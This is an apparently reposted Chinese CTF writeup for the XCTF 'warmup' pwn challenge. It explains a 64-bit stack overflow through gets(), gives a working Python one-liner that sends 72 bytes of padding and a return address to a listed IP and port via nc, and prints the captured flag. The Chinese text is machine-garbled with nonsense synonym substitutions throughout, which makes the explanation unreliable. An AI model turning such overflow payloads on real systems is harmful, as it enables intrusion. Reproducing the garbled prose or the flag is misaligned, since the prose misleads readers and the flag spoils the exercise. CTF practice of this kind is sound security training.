首页
服装论坛t.vhao.net
专栏
课程

[原创]XCTF 攻防世界 PWN 高手进阶区 csaw-ctf-2016-quals warmup writeup

2019-5-11 16:59 1095

[原创]XCTF 攻防世界 PWN 高手进阶区 csaw-ctf-2016-quals warmup writeup

2019-5-11 16:59
1095
拿到标题起首停止初步检查,64位,栈弗成履行
用IDA翻开,检查字符串

发明关键字符串,检查调用情况




在gets函数处输入v5,在这里可以经过过程覆盖函数前往地址调用sub_40060D,而char v5; // [rsp+40h] [rbp-40h],即客栈中v5占了0x40h,以后则是存放rbp的地位,大年夜小为8,函数前往地址在rbp+8,即0x40+8+8=80,即总长度为80,输入的渣滓数据为80-8=72,覆盖前往地址大年夜小为8,

直接连接docker镜像传入参数


即python -c 'from struct import pack as p; print "A" * 72 + p("Q", 0x40060d)' | nc 111.198.29.45 44972

flag:cyberpeace{bca29fd1fc292bd1b7964acaaaabf724}



[推荐]看雪企服平台,供给安然分析、定制项目开辟、APP等级保护、渗透渗出测试等安然办事!

上传的附件:
上一主题 下一主题
最新答复 (0)
旅客
登录 | 注册 方可回帖
前往